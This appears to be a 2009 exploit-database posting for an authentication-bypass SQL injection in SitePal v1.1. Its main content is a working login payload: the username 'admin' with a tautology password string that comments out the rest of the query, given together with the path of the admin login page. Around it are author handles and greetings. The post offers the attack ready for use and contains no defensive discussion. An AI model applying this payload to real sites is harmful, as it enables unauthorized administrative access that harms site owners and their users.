[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SitePal v1.1(Auth Bypass) SQL Injection Vulnerability
# Published : 2009-12-15
# Author : R3d-D3v!L
# Previous Title : GalleryPal FE v1.5(Auth Bypass)
# Next Title : Ez Guestbook 1.0 Multiple Vulnerabilities


[~] SitePal v1.1(Auth Bypass) Remote SQL Injection Vulnerability
[~]
[~] ----------------------------------------------------------
[~] author: R3d-D3v!L
[~]
[~] Date: 15.12.2009
[~] 7!M3:1-35
[~] Home: www.Xp10.ME
[~]
[~] contact: N/A
[~]
[~] -----------------------------------------------------------


[~] Exploit:


username:admin
password: X' or ' 1=1--

[~] admin login for demo:

server/SitePalDemo/z_admin_login.asp



[~]--------------------------------------------------------------------------------
[~] Greetz tO:dolly & ab0 mohammed & XP_10 h4CK3R&  JASM!N & c0prA & MY-M!ND ;)
[~]
[~] mkank.com
[~] spechial thanks :{off-s3c} & ((dolly)) & ((7am3m)) & dev!l_mody & 0R45hy & meg4 ;)
[~]
[?] 4.!.5 ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA--.....
[~]
[~]I4M:4r48!4N-3XPLO!73R

[~]
[~]--------------------------------------------------------------------------------